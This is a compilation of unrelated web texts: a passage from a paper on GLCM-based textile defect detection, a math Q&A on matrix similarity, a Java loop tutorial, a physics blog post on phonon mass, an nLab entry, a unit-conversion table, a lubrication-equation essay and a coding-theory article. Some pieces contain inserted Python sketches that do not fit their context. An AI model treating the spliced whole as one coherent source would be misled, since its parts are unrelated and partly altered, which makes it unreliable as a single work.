Once the number of layers and the number of units in each layer are selected, the weights and network thresholds should be set so as to minimize the prediction error made by the system. That is the goal of the learning algorithms, which are used to adjust the weights and thresholds automatically to reduce this error.

4. Image Analysis (Feature Extraction & Preprocessing Data)

Feature extraction is defined as the transformation of the input data into a set of characteristics with dimensionality reduction. In other words, the input data to an algorithm are converted into a reduced representation set of features (a feature vector).

In this paper, we extract some characteristics of a digital image by using the GLCM: Contrast, Correlation, Energy, and Homogeneity. The system was implemented using MATLAB; the MATLAB functions that we utilized in this work are indicated between < >. The proposed system is composed of mainly three modules: pre-processing, segmentation and feature extraction. Pre-processing is done by median filtering < >. Segmentation is carried out by the Otsu method < >. Feature extraction is based on GLCM features (Contrast, Correlation, Homogeneity, and Energy) implemented by < >. The extraction of the textural characteristics of the segmented image is done using gray level co-occurrence matrices (GLCM).
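The GLCM construction of Equation (1) and the features of Equations (2)-(5) that drive this pipeline can be computed directly in NumPy. This is an illustrative sketch, not the paper's MATLAB implementation; the test image, gray-level count, and the single [0 1] offset are arbitrary choices:

```python
import numpy as np

def glcm(img, offset, levels):
    """Normalized gray-level co-occurrence matrix for one pixel offset."""
    dr, dc = offset
    rows, cols = img.shape
    P = np.zeros((levels, levels))
    for r in range(rows):
        for c in range(cols):
            r2, c2 = r + dr, c + dc
            if 0 <= r2 < rows and 0 <= c2 < cols:
                P[img[r, c], img[r2, c2]] += 1
    return P / P.sum()

def glcm_features(P):
    """Energy, contrast, correlation, homogeneity of a normalized GLCM."""
    i, j = np.indices(P.shape)
    energy = np.sum(P ** 2)                          # Eq. (2)
    contrast = np.sum((i - j) ** 2 * P)              # Eq. (3)
    mu_i, mu_j = np.sum(i * P), np.sum(j * P)
    sd_i = np.sqrt(np.sum((i - mu_i) ** 2 * P))
    sd_j = np.sqrt(np.sum((j - mu_j) ** 2 * P))
    correlation = np.sum((i - mu_i) * (j - mu_j) * P) / (sd_i * sd_j)  # Eq. (4)
    homogeneity = np.sum(P / (1 + np.abs(i - j)))    # Eq. (5)
    return energy, contrast, correlation, homogeneity

img = np.array([[0, 0, 1, 1],
                [0, 0, 1, 1],
                [0, 2, 2, 2],
                [2, 2, 3, 3]])
P = glcm(img, offset=(0, 1), levels=4)   # horizontal neighbor, offset [0 1]
print(glcm_features(P))
```

Running the three remaining offsets of Section 4 ([−1 1], [−1 0], [−1 −1]) and concatenating the four feature quadruples gives exactly the 16-element vector fed to the classifier.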
The textural characteristics are extracted from four spatial orientations: horizontal, diagonal, vertical and anti-diagonal, corresponding to (0°, 45°, 90°, and 135°), using < > with the offsets {[0 1], [−1 1], [−1 0], [−1 −1]}, which define a neighboring pixel in the four possible directions (see Figure 2).

In the following subsection 4.1, we present a descriptor based on the GLCM computation.

4.1. GLCM Descriptor Steps

1) Preprocessing (color to gray, noise removal, resize to 256 × 256);

2) Segmentation;

3) Feature extraction based on GLCM features using < > with the offsets [0 1; −1 1; −1 0; −1 −1];

4) Concatenation of the Contrast, Correlation, Energy and Homogeneity values.

Figure 1. Feed-forward neural network with three layers.

Figure 2. Adjacency of a pixel in four directions (horizontal, vertical, left and right diagonals).

The proposed algorithm is implemented in a MATLAB program developed by the author. After applying the GLCM descriptor steps (4.1) to the image, we obtain a feature vector of dimension 16 as input to the neural network classifier (Figure 3). The data set is divided into two sets, one for training and one for testing. Preprocessing parameters are determined using a matrix containing all the features used for training or testing; the same settings are used to pre-process the test feature vectors before transmission to the trained neural network.

A fixed number (m) of examples from each class is assigned to the training set and the remaining (m − n) to the testing set. The inputs and targets are normalized so that they have zero mean and standard deviation 1. The feed-forward back-propagation network is trained using the normalized training sets. The number of inputs of the ANN equals the number of features (m = 16). Each hidden layer contains 2m neurons, and the two outputs equal the number of classes (without defects, with defects); see Figure 4 and Figure 5 respectively.

4.2. Simulation and Discussion

We have developed a real database of 1500 images of jeans tissue; some images contain defects. The momentum is 0.9 and the learning rate is 0.01 (α and η in Equation (6)). The ANN output is represented by a vector belonging to [0, 1]^n. We describe all the features of the training set in the form of a matrix FM (Equation (7)); each column represents the features of one pattern. If the training set contains m instances of each pattern belonging to a class, the dimension of the matrix FM is equal to m × n, where m is the number of features (the feature vector size) and n is the number of classes. The first columns 1, 2, 3, … of the matrix FM represent the feature instances of the patterns (textile) that belong to class 1; the next block of columns represents the feature instances of the patterns (textile) that belong to class 2, etc. (see Figure 6(a) with d = 6 and Figure 6(b) with d = 9).

The accuracy of the system is calculated using the following equation:

Accuracy = (N_c / N_t) × 100%,  (8)

where N_c is the number of correctly identified images and N_t is the total number of testing images.

The learning set contains six patterns for each category, and the testing set contains nine patterns for each category, with accuracy 100%. The system was then trained with 7 images of each class and tested with 11, 13, 18, 21, 23, and 28 images of each category. Figure 7 shows the system accuracy: the best is 100% and the worst is 91%. The best identification results (100%) were obtained when the sizes of each class were 11, 13, and 18.

The system was also trained with a sample of ten images of each category and tested with 1, 2, …, 26 images of each category.

Figure 3. Flowchart of the proposed method.

Figure 4. Example of an image without defect.

Figure 5. Example of an image with defect.

Figure 6. (a) Neural output matrix with learning set, 6 patterns per class (100%); (b) Neural output matrix with testing set, 9 patterns per class (100%).

Figure 8 shows the system accuracy: the best is 100% and the worst is 90.5%. We obtained the best results (100% identification) when the sizes of the testing classes were 1, 2, …, 15.

Figure 7 shows the correlation between the system accuracy and the size of the testing data set. With a given learning data set, increasing the number of patterns per class for testing decreases the system efficiency; increasing the ratio of training examples to testing examples increases the recognition rate.

Figure 7. (a)-(f): Neural output matrix with testing data sets of 11, 13, 18, 21, 23, 28 patterns for each class, where the learning data set is 7.

Figure 8. System efficiency with different sizes of testing data set (1, 2, …, 26), where the size of the learning data set is 10.

5. Conclusion

We studied and developed an efficient method of textile defect identification based on the GLCM and neural networks. The descriptor of the textile image, based on statistical features of the GLCM, is used as input to a neural network classifier for recognition and classification of defects in raw textile. A one-hidden-layer feed-forward neural network is used. Experimental results showed that the proposed method is efficient, and the recognition rate is 100% for training and 100% and 91% (best and worst) for testing. This study can take part in developing a computer-aided decision (CAD) system for Tissue online Automatic Inspection (TAI). In future work, various effective features will be extracted from the textile image and used with other classifiers such as the support vector machine.

Conflicts of Interest

The authors declare no conflicts of interest.

References

1. Abdel Azim, G. and Nasir, S. (2013) Textile Defects Identification Based on Neural Networks and Mutual Information. International Conference on Computer Applications Technology (ICCAT), Sousse, Tunisia, 20-22 January 2013, 98. http://dx.doi.org/10.1109/ICCAT.2013.6522055
2. Davis, L.S. (1975) A Survey on Edge Detection Techniques. Computer Graphics and Image Processing, 4, 248-270. http://dx.doi.org/10.1016/0146-664X(75)90012-X
3. Huang, D.-S., Wunsch, D.C., Levine, D.S. and Jo, K.-H., Eds. (2008) Advanced Intelligent Computing Theories and Applications, with Aspects of Theoretical and Methodological Issues. Proceedings of the 4th International Conference on Intelligent Computing (ICIC), China, 15-18 September 2008, 701-708.
4. Walker, R.F., Jackway, P.T. and Longstaff, I.D. (1997) Recent Developments in the Use of the Co-Occurrence Matrix for Texture Recognition. Proceedings of the 13th International Conference on Digital Signal Processing, Brisbane, Queensland University, 1997. http://dx.doi.org/10.1109/ICDSP.1997.627968
5. Sahoo, M. (2011) Biomedical Image Fusion and Segmentation Using GLCM. International Journal of Computer Applications, Special Issue on "2nd National Conference on Computing, Communication and Sensor Network" (CCSN), 34-39.
6. Gonzalez, R.C. and Woods, R.E. (2002) Digital Image Processing. 2nd Edition, Prentice Hall, India.
7. Kekre, H.B., Sudeep, D.T., Taneja, K.S. and Suryawanshi, S.V. (2010) Image Retrieval Using Texture Features Extracted from GLCM, LBG and KPE. International Journal of Computer Theory and Engineering, 2, 1793-8201. http://dx.doi.org/10.7763/ijcte.2010.v2.227
8. Haddon, J.F. and Boyce, J.F. (1993) Co-Occurrence Matrices for Image Analysis. IEEE Electronics & Communication Engineering Journal, 5, 71-83. http://dx.doi.org/10.1049/ecej:19930013
9. de Almeida, C.W.D., de Souza, R.M.C.R. and Candeias, A.L.B. (2010) Texture Classification Based on a Co-Occurrence Matrix and Self-Organizing Map. IEEE International Conference on Systems, Man & Cybernetics, University of Pernambuco, Recife, 2010. http://dx.doi.org/10.1109/icsmc.2010.5641934
10. Haralick, R.M., Shanmugam, K. and Dinstein, I. (1973) Textural Features for Image Classification. IEEE Transactions on Systems, Man, and Cybernetics, 3, 610-621.
11. Flusser, J. and Suk, T. (1993) Pattern Recognition by Affine Moment Invariants. Pattern Recognition, 26, 167-174. http://dx.doi.org/10.1016/0031-3203(93)90098-H
12. Lo, C.H. and Don, H.S. (1989) 3D Moment Forms: Their Construction and Application to Object Identification and Positioning. IEEE Transactions on Pattern Analysis and Machine Intelligence, 11, 1053-1064. http://dx.doi.org/10.1109/34.42836
13. Srinivasan, G.N. and Shobha, G. (2008) Segmentation Techniques for ATDR. Proceedings of the World Academy of Science, Engineering, and Technology, 36, 2070-3740.
14. Tuceryan, M. (1994) Moment Based Texture Segmentation. Pattern Recognition Letters, 15, 659-667. http://dx.doi.org/10.1016/0167-8655(94)90069-8
15. Gonzalez, R.C. and Woods, R.E. (2008) Digital Image Processing. 3rd Edition, Prentice Hall, India.
16. Eleyan, A. and Demirel, H. (2011) Co-Occurrence Matrix and Its Statistical Features as a New Approach for Face Recognition. Turkish Journal of Electrical Engineering and Computer Science, 19, No. 1.
17. Krose, B. and Van Der Smagt, P. (1996) An Introduction to Neural Networks. 8th Edition. http://www.fwi.uva.nl/research/neuro
18. Bishop, C. (1995) Neural Networks for Pattern Recognition. Clarendon Press, Oxford, UK.
19. Freeman, J.A. and Skapura, D.M. (1991) Neural Networks: Algorithms, Applications and Programming Techniques. Addison-Wesley, Reading.
20. Rumelhart, D.E., Hinton, G.E. and Williams, R.J. (1986) Learning Internal Representations by Error Propagation. In: Rumelhart, D.E. and McClelland, J.L., Eds., Parallel Distributed Processing: Explorations in the Microstructure of Cognition: Foundations, MIT Press, Cambridge, 318-362.
21. Rumelhart, D.E., Durbin, R., Golden, R. and Chauvin, Y. (1995) Backpropagation: The Basic Theory. In: Chauvin, Y. and Rumelhart, D.E., Eds., Backpropagation: Theory, Architectures and Applications, Lawrence Erlbaum, Hillsdale, 1-34.
22. Rumelhart, D.E., Hinton, G.E. and Williams, R.J. (1986) Learning Representations by Back-Propagating Errors. Nature, 323, 533-536. http://dx.doi.org/10.1038/323533a0
23. Patterson, D. (1996) Artificial Neural Networks. Prentice Hall, Singapore.
24. Haykin, S. (1994) Neural Networks: A Comprehensive Foundation. Macmillan Publishing, New York.
25. Azim, G.A. and Sousow, M.K. (2008) Multi-Layer Feed Forward Neural Networks for Olive Trees Identification. IASTED Conference on Artificial Intelligence and Applications, Austria, 11-13 February 2008, 420-426.
26. Kattmah, G. and Azim, G.A. (2013) Fig (Ficus Carica L.) Identification Based on Mutual Information and Neural Networks. International Journal of Image, Graphics and Signal Processing (IJIGSP), 5, No. 9.
https://math.stackexchange.com/questions/4245724/a-question-related-to-similarity-of-a-complex-matrix-that-is-not-scalar-multiple
# A question related to similarity of a complex matrix that is not a scalar multiple of $I_n$

This question was asked in a master's exam for which I am preparing, and I was unable to solve it.

Let $A$ be an $n\times n$ complex matrix that is not a scalar multiple of $I_n$. Show that $A$ is similar to a matrix $B$ such that $B_{1,1}$ (i.e. the top-left entry of $B$) is $0$.

I don't even have an intuition for this question's solution: in the case when $A$ is not a scalar multiple of $I_n$ but $\operatorname{rank} A = n$, I don't see why $B_{1,1}$ should be able to be $0$.

I have studied the theory from Hoffman and Kunze, but I was unable to work through the exercises due to illness, and I need help.

• Just try to use a similarity transformation which changes this entry. Start with $n=2$ for an explicit calculation (to get some concrete understanding) and then generalize. Sep 9 at 8:00
• The case of $2\times2$ matrices is a very good start. You can use the matrix $\begin{pmatrix}1&x\\0&1\end{pmatrix}$ as a similarity matrix in the first step. Sep 9 at 8:15
• The minimal polynomial has degree at least 2, and $A$ is similar to its rational canonical form. Sep 9 at 19:35

There are many ways to solve this question. Assume $n \geq 2$ (otherwise there is nothing to prove) and let $T = T_A \colon \mathbb{C}^n \rightarrow \mathbb{C}^n$ be the associated linear map given by $T_A(x) = Ax$. Assume that we can find $0 \neq v \in \mathbb{C}^n$ that is not an eigenvector of $T$. This means that $v \neq 0$ and $T(v)$ is not a scalar multiple of $v$, so $\{ v, T(v) \}$ is linearly independent. Complete $\{ v, T(v) \}$ to an ordered basis $\mathcal{B} = \left( v, T(v), v_3, \dots, v_n \right)$ of $\mathbb{C}^n$. Then the matrix representing $T$ with respect to $\mathcal{B}$ is similar to $A$ and has $\begin{pmatrix} 0 \\ 1 \\ 0 \\ \vdots \\ 0 \end{pmatrix}$ as its first column.

This leaves you with proving that if $A$ is not a scalar multiple of the identity then one can find at least one non-zero vector which is not an eigenvector of $A$. I'll leave this as an exercise (whose solution you can find on this website).

• I have some questions: why does "the matrix representing $T$ with respect to $\mathcal{B}$ is similar to $A$" hold? And why does it have $\begin{pmatrix} 0 \\ 1 \\ 0 \\ \vdots \\ 0 \end{pmatrix}$ as its first column? Please explain. Sep 18 at 11:35
• @James: Whenever you represent a linear map with respect to two different bases, you get similar matrices. In this case, $T$ is represented by $A$ with respect to the standard basis. The second question follows immediately from the definition of the representing matrix: you have $T(v) = 0 \cdot v + 1 \cdot T(v) + 0 \cdot v_3 + \dots + 0 \cdot v_n$, which means that the coefficients, rearranged as a column, form the first column of the representing matrix. Sep 21 at 22:56
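The construction in the answer is easy to check numerically. Below is a minimal sketch (the matrix `A`, the vector `v`, and the completing basis vector are arbitrary illustrative choices of mine, not from the original post): take `v` not an eigenvector, form the ordered basis `(v, Av, e3)`, and verify that the change-of-basis matrix `P` yields `B = P⁻¹AP` with top-left entry zero and first column `(0, 1, 0)`.

```python
import numpy as np

# An arbitrary 3x3 complex matrix that is NOT a scalar multiple of the identity.
A = np.array([[2, 1, 0],
              [0, 2, 0],
              [0, 0, 5]], dtype=complex)

v = np.array([0, 1, 0], dtype=complex)   # e2 is not an eigenvector: A @ v = (1, 2, 0)
Av = A @ v
e3 = np.array([0, 0, 1], dtype=complex)  # completes {v, Av} to a basis of C^3

# Columns of P are the ordered basis (v, Av, e3); B represents T in that basis.
P = np.column_stack([v, Av, e3])
B = np.linalg.inv(P) @ A @ P

# First column of B is (0, 1, 0)^T, so the top-left entry B[0, 0] is 0.
```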
https://ded9.com/tutorial-for-each-loop-in-java-in-very-simple-language/
# In Java, there is another form of loop (in addition to the standard for loop) for working with arrays and collections.

If you are working with arrays and collections, you can use another for loop structure (the enhanced for loop) to iterate over their items.

This type of loop is called for-each because the loop iterates through each array/collection element.

Here is an example of iterating over the elements of an array using the standard for loop in Java:

```java
class ForLoop {
    public static void main(String[] args) {
        char[] vowels = {'a', 'e', 'i', 'o', 'u'};
        for (int i = 0; i < vowels.length; ++i) {
            System.out.println(vowels[i]);
        }
    }
}
```

#### You can also write the above code using the for-each loop:

```java
class ForEachLoop {
    public static void main(String[] args) {
        char[] vowels = {'a', 'e', 'i', 'o', 'u'};
        // for-each loop
        for (char item : vowels) {
            System.out.println(item);
        }
    }
}
```

#### The output of both programs is the same:

```
a
e
i
o
u
```

Using the enhanced for loop is easier to write and makes the code more readable. Hence it is usually recommended over the standard form.

## For-each loop structure

First let's look at the for-each loop syntax:

```java
for (dataType item : collection) {
    // body of loop
}
```

In the above structure,

- collection is the collection or array you want to loop over.
- item is a single element of the collection.

## How does the for-each loop work?

Here's how the for-each loop works. It:

- iterates through each element in the given array or collection,
- stores each element in the variable item,
- and executes the body of the loop.

Example: for-each loop

The following program calculates the sum of all the elements of an array of integers.

```java
class EnhancedForLoop {
    public static void main(String[] args) {
        int[] numbers = {3, 4, 5, -5, 0, 12};
        int sum = 0;
        for (int number : numbers) {
            sum += number;
        }
        System.out.println("Sum = " + sum);
    }
}
```

Output

```
Sum = 19
```

In the above program, the for-each loop executes as follows (the original article shows this as a figure):

- all elements of numbers are iterated over,
- each element is stored in the number variable,
- and the body of the loop is executed, i.e. the number is added to sum.
http://nanoscale.blogspot.com/2018/08/phonons-and-negative-mass.html
Saturday, August 18, 2018

Phonons and negative mass

There has been quite a bit of media attention given to this paper, which looks at whether sound waves involve the transport of mass (and therefore whether they should interact with gravitational fields and produce gravitational fields of their own).

The authors conclude that, under certain circumstances, sound wavepackets (phonons, in the limit where we really think about quantized excitations) rise in a downward-directed gravitational field.  Considered as a distinct object, such a wavepacket has some property, the amount of "invariant mass" that it transports as it propagates along, that turns out to be negative.

Now, most people familiar with the physics of conventional sound would say, hang on, how do sound waves in some medium transport any mass at all?  That is, we think of ordinary sound in a gas like air as pressure waves, with compressions and rarefactions, regions of alternating enhanced and decreased density (and pressure).  In the limit of small amplitudes (the "linear regime"), we can consider the density variations in the wave to be mathematically small, meaning that we can use the parameter $\delta \rho/\rho_{0}$ as a small perturbation, where $\rho_{0}$ is the average density and $\delta \rho$ is the change.  Linear-regime sound usually doesn't transport mass.  The same is true for sound in the linear regime in a conventional liquid or a solid.

In the paper, the authors do an analysis where they find that the mass transported by sound is proportional, with a negative sign, to $dc_{\mathrm{s}}/dP$, how the speed of sound $c_{\mathrm{s}}$ changes with pressure for that medium.  (Note that for an ideal gas, $c_{\mathrm{s}} = \sqrt{\gamma k_{\mathrm{B}}T/m}$, where $\gamma$ is the ratio of heat capacities at constant pressure and volume, $m$ is the mass of a gas molecule, and $T$ is the temperature.  There is no explicit pressure dependence, and sound is "massless" in that case.)

I admit that I don't follow all the details, but it seems to me that the authors have found that for a nonlinear medium such that $dc_{\mathrm{s}}/dP > 0$, sound wavepackets have a bit less mass than the average density of the surrounding medium.  That means that they experience buoyancy (they "fall up" in a downward-directed gravitational field) and exert an effectively negative gravitational potential compared to their background medium.  It's a neat result, and I can see where there could be circumstances where it might be important (e.g. sound waves in neutron stars, where the density is very high and you could imagine astrophysical consequences).  That being said, perhaps someone in the comments can explain why this is being portrayed as so surprising - I may be missing something.

Anonymous said...
Astro folks are trying to have fun again...

Douglas Natelson said...
Anon@7:35, love it. When I was a kid, like 10, I saw some of these when they would broadcast his segments on PBS in Pittsburgh. They looked really old even then, but they were still fun.

Josh W said...
Coming to this a little later, I think it's probably because visualising the mass of waves is something that tends to go along with quantum intuition, and sound is something that everyone already understands, so you know, it's a cool overlap of those two ideas.

Also, I was looking at phonons in crystals under the usual approach using sine functions, and they also seem to have negative effective masses for non-zero energy, based on finding the inverse of the second-derivative matrix of the dispersion relation.

I did a back-of-envelope calculation, and it came out something like (Planck's constant)/((Debye velocity)/(2k) * (lattice constant) * (delta_ij - k_i k_j / K^2)) for small deviations from zero,

but the more important thing is that looking at the dispersion relation curve, it has no minima, only maxima, so with the exception of zero-energy phonons, it will always have a negative curvature and a slightly negative mass.

I'm still not sure what status effective mass has as a physical thing, but if it does, that would match up at least.
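As a quick sanity check on the ideal-gas sound-speed formula quoted in the post, here is a short numerical sketch. The input values for air (γ ≈ 1.4, mean molecular mass ≈ 28.97 u, T = 293 K) are my own illustrative choices, not from the post:

```python
import math

k_B = 1.380649e-23        # Boltzmann constant, J/K
gamma = 1.4               # ratio of heat capacities for air (diatomic, approximate)
m = 28.97 * 1.66054e-27   # mean mass of an "air molecule", kg
T = 293.0                 # room temperature, K

# c_s = sqrt(gamma * k_B * T / m) for an ideal gas
c_s = math.sqrt(gamma * k_B * T / m)
print(f"{c_s:.0f} m/s")   # close to the familiar ~343 m/s for air at room temperature
```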
https://www.ncatlab.org/nlab/show/properly+discontinuous+action
# Contents

## Definition

The action of a topological group $G$ on a topological space $X$ is called properly discontinuous if every point $x \in X$ has a neighbourhood $U_x$ such that the intersection $g(U_x) \cap U_x$ of $U_x$ with its translate under the group action via some element $g \in G$ is non-empty only for the neutral element $e \in G$:

$g(U_x) \cap U_x \neq \emptyset \phantom{AA} \Rightarrow \phantom{AA} g = e$

This is equivalent to the condition that the quotient space coprojection $X \longrightarrow X/G$ is a covering space-projection.

Therefore properly discontinuous actions are also called covering space actions (Hatcher).

## References

• Jack Lee, chapter 12 of Introduction to Topological Manifolds

• Jack Lee, chapter 21 of Introduction to Smooth Manifolds

• Jack Lee, MO comment, Dec. 2014
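As a concrete illustration (my own example, not from the page above): the translation action of $\mathbb{Z}$ on $\mathbb{R}$ is properly discontinuous, with quotient coprojection the covering $\mathbb{R} \to \mathbb{R}/\mathbb{Z} \simeq S^1$. A tiny numeric sketch of the defining condition:

```python
# Z acts on R by g.x = x + g. For any x, take U_x = (x - 0.4, x + 0.4).
# Then g(U_x) = (x + g - 0.4, x + g + 0.4), which meets U_x iff |g| < 0.8,
# i.e. (for integer g) iff g = 0 -- exactly the properly-discontinuous condition.
def translates_meet(g, half_width=0.4):
    # The two open intervals overlap iff the shift is smaller than their total width.
    return abs(g) < 2 * half_width

assert translates_meet(0)                                   # the identity always overlaps
assert not any(translates_meet(g) for g in range(1, 100))   # no nontrivial overlap
assert not any(translates_meet(g) for g in range(-99, 0))
```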
http://www.kylesconverter.com/volume/pints-(imperial)-to-fluid-drams-(us)
# Convert Pints (imperial) to Fluid Drams (US)

Kyle's Converter > Volume > Pints (imperial) > Pints (imperial) to Fluid Drams (US)

Unit Descriptions

1 Pint (Imperial): 1/8 gal (Imp)

1 Fluid Dram (US): 1/8 of a fluid ounce (US); 3.6966911953125 milliliters.

Conversions Table

| Pints (imperial) | Fluid Drams (US) | Pints (imperial) | Fluid Drams (US) |
|---|---|---|---|
| 1 | 153.7216 | 70 | 10760.5113 |
| 2 | 307.4432 | 80 | 12297.7272 |
| 3 | 461.1648 | 90 | 13834.9431 |
| 4 | 614.8864 | 100 | 15372.159 |
| 5 | 768.608 | 200 | 30744.3181 |
| 6 | 922.3295 | 300 | 46116.4771 |
| 7 | 1076.0511 | 400 | 61488.6362 |
| 8 | 1229.7727 | 500 | 76860.7952 |
| 9 | 1383.4943 | 600 | 92232.9543 |
| 10 | 1537.2159 | 800 | 122977.2724 |
| 20 | 3074.4318 | 900 | 138349.4314 |
| 30 | 4611.6477 | 1,000 | 153721.5905 |
| 40 | 6148.8636 | 10,000 | 1537215.9046 |
| 50 | 7686.0795 | 100,000 | 15372159.0465 |
| 60 | 9223.2954 | 1,000,000 | 153721590.465 |
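The tabulated factor follows directly from the two unit definitions (1 imperial gallon = 4.54609 L exactly, so 1 imperial pint = 568.26125 mL; 1 US fluid dram = 3.6966911953125 mL, as stated above). A small sketch of the conversion:

```python
IMPERIAL_PINT_ML = 4.54609 * 1000 / 8   # 568.26125 mL (1/8 of an imperial gallon)
US_FLUID_DRAM_ML = 3.6966911953125      # 1/8 of a US fluid ounce

# One imperial pint expressed in US fluid drams.
factor = IMPERIAL_PINT_ML / US_FLUID_DRAM_ML
print(round(factor, 4))                 # 153.7216, matching the first table entry

def pints_imp_to_fl_dr_us(pints):
    return pints * factor
```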
https://www2.bartleby.com/essay/Analysis-Of-The-Navier-Stroke-Equation-FCX6ACLE6
# Analysis Of The Navier-Stokes Equation

General Equation

The Navier-Stokes equations are the basis of basic lubrication theory used to solve the problem. The fluid characteristics such as density and viscosity are kept almost constant in solving the fluid flow problem. The following problems are solved with the Navier-Stokes equations:

- Laminar unidirectional flow between stationary parallel plates.
- Laminar unidirectional flow between parallel plates having relative motion.
- Laminar flow in circular pipes.
- Laminar flow between concentric rotating cylinders.

The x-momentum Navier-Stokes equation can be written as:

$$\rho \frac{Du}{Dt}=\rho X-\frac{\partial p}{\partial x}+\frac{\partial}{\partial x}\left\{\eta\left[2\frac{\partial u}{\partial x}-\frac{2}{3}\left(\frac{\partial u}{\partial x}+\frac{\partial v}{\partial y}+\frac{\partial w}{\partial z}\right)\right]\right\}+\frac{\partial}{\partial y}\left[\eta\left(\frac{\partial u}{\partial y}+\frac{\partial v}{\partial x}\right)\right]+\frac{\partial}{\partial z}\left[\eta\left(\frac{\partial u}{\partial z}+\frac{\partial w}{\partial x}\right)\right]$$

A typical value of h/L is about 10^-3. After these assumptions, the Navier-Stokes equations reduce to the following:

$$u \frac{\partial u}{\partial x}+ v \frac{\partial u}{\partial y}=-\frac{\partial P}{\partial x}+\mu\left(\frac{\partial^2 u}{\partial x^2}+\frac{\partial^2 u}{\partial y^2}\right) \qquad (5)$$

$$u \frac{\partial v}{\partial x}+ v \frac{\partial v}{\partial y}=-\frac{\partial P}{\partial y}+\mu\left(\frac{\partial^2 v}{\partial x^2}+\frac{\partial^2 v}{\partial y^2}\right) \qquad (6)$$

and the continuity equation is

$$\frac{\partial u}{\partial x}+ \frac{\partial v}{\partial y}=0 \qquad (7)$$

$$W =\int_0^L \int_0^B P \, dx \, dy \qquad (8)$$

$$F_f = \int_0^L \int_0^B \tau \, dx \, dy \qquad (9)$$

$$\mu= \frac{F_f}{W} \qquad (10)$$

Equations (8), (9) and (10) are used to calculate the load-carrying capacity, the friction force and the coefficient of friction.

Geometries Used and Parametric Study

The current work studies the effects of different geometry shapes (cylindrical, and sectors with offset and change in orientation) on sliding bearing performance. The hydrodynamic plain slider bearing, shown in Figure 3.1, has a stationary plate and a moving plate separated by the lubricant oil. The direction of motion and the inclination are given in such a way that the convergent film is [...]

The texture parameters include the height ratio and the area density ratio of the dimples. The performance parameters of the textured surface are compared relative to the plain sliding bearing. The following ratios are used throughout the study:

- Load-carrying capacity ratio = (load-carrying capacity of dimpled bearing, W_d) / (load-carrying capacity of plain bearing, W)
- Coefficient of friction ratio = (coefficient of friction of dimpled bearing, mu_d) / (coefficient of friction of plain bearing, mu)
- Volume flow rate ratio = (volume flow rate of dimpled bearing, Q_d) / (volume flow rate of plain bearing, Q)
- Height ratio (zeta) = (dimple depth of the bearing, h_d) / (minimum film thickness of the bearing, h2)
- Area density (alpha) = (area of the dimples, A_d) / (area of the bearing, A) x 100
- Attitude (lambda) = (minimum thickness, h1) / (maximum thickness)
https://i-programmer.info/babbages-bag/211-coding-theory.html
[ "Coding Theory\nThursday, 14 February 2019\nArticle Index\nCoding Theory\nMake It Equal\nHuffman And Zip\n\nInformation theory – perhaps one of the most remarkable inventions of the twentieth century - naturally leads on to the consideration of how information can be coded and hence coding theory.\n\n## A Programmers Guide To Theory - NP & Co-NP", null, "#### Contents\n\n*To be revised\n\nIn Information Theory we learned that if a message or symbol occurs with probability p then the information contained in that symbol or message is -log2(p) bits.\n\nFor example, consider the amount of information contained in a single letter from an alphabet. Assuming there are 26 letters in an alphabet and assuming they are all used equally often the probability of receiving any one particular letter is 1/26 which gives -log2(1/26)=4.7 bits per letter.\n\nIt is also obvious from other elementary considerations that five bits are more than enough to represent 26 symbols. Quite simply five bits allow you to count up to more than 26 and so you can assign one letter of the alphabet to each number. In fact, five bits is enough to  represent 32 symbols because you can count up to 31 i.e. 11111=31.\n\nUsing all five bits you can associate say A with 0 and Z with 25 and the values from 26 to 31  are just wasted. It seems a shame to have wasted bits just because we can’t quite find a way to use 4.7 bits – or can we.\n\nCan we split the bit?\n\n## Average information\n\nBefore we go on to consider “splitting the bit” we need to look more carefully at the calculation of the number of bits of information in one symbol from an alphabet of 26.\n\nClearly the general case is that a symbol from an alphabet of n symbols has information equal to –log2(n) bits assuming that every symbol has equal probability.\n\nOf course what is wrong with this analysis is that the letters of the alphabet are not all equally likely to occur. 
For example, if you don’t receive a letter “e” you would be surprised – count the number in this sentence. However your surprise at seeing the letter “z” should be higher – again count the number in some other sentence than this one!\n\nEmpirical studies can provide us with the actual rates that letters occur – just count them in a book for example. If you add the “Space” character to the set of symbols you will discover that it is by far the most probable character with a probability of 0.185 of occurring, followed by “e” at 0.100, “t” at 0.080 and so on.. down to “z” which has a probability of only 0.0005. It makes you wonder why we bother with “z” at all!\n\nBut, given that “z” is so unlikely its information content is very high –log2(0.0005)=10.96 bits. In other words “z” contains nearly 11 bits of information compared to just over 3 bits for “e”.\n\nIf you find this argument difficult to follow just imagine that you are placing bets on the next symbol to appear. You expect the next symbol to be a Space character so you are very surprised when it turns out to be a z. Your betting instincts tell you what the expected behaviour of the world is and when something happens that isn't expected you gains some information.\n\nTaken to the extreme it seems almost obvious. The sun rises every morning and so the news that it has risen this morning is really no news - no information. Now consider the opposite event, that is some information!\n\nWe can define an average information that we expect to get from a single character taken from the alphabet.\n\nIf the ith symbol occurs with probability pi then the information it contains is –log2(pi) bits and the average information contained in one symbol, averaged over all symbols is:\n\n`Average information= –p1log2(p1) – p2log2(p2) –p3log2(p3) … –pnlog2(pn)`\n\nYou can see that this is reasonable because each symbol occurs with probability pi and each time it occurs it provides –log2(pi) bits of information. 
Notice that while “z” carries 11 bits of information the fact that it doesn’t occur very often means that its contribution to the average information is only about 0.0005 x 11 or 0.0055 bits per symbol.\n\nApplying this formula to the letters of the alphabet and their probabilities gives an average information of 4.08 bits per symbol which should be compared to 4.76 bits per symbol for an alphabet of 27 equally likely characters. Notice that the average information in 27 equally likely characters is also 4.76 bits – to see why try working it out.\n\nThere is also a nice theorem which says that the average information per symbol is largest if all of the symbols are equally likely. This means that if any of the symbols of an alphabet are used more or less often than others the average information per symbol is lower and this observation is the key to data compression techniques.\n\n<ASIN:0521852293>\n\n<ASIN:0252725484>\n\n<ASIN:0198538030>\n\nLast Updated ( Thursday, 14 February 2019 )" ]
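The average-information formula above is just the Shannon entropy and is easy to compute directly. A short sketch (the probability lists are the uniform cases discussed in the text; the skewed distribution is my own example illustrating the theorem that uniform distributions maximise average information):

```python
import math

def average_information(probs):
    """Average bits per symbol: -sum of p_i * log2(p_i) over symbols with p_i > 0."""
    return -sum(p * math.log2(p) for p in probs if p > 0)

# 26 equally likely letters: -log2(1/26), about 4.70 bits per symbol
print(round(average_information([1 / 26] * 26), 2))   # 4.7

# 27 equally likely symbols (letters plus space): log2(27), about 4.75 bits
print(round(average_information([1 / 27] * 27), 2))   # 4.75

# Skewing the distribution always lowers the average information:
skewed = [0.5] + [0.5 / 26] * 26
assert average_information(skewed) < average_information([1 / 27] * 27)
```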
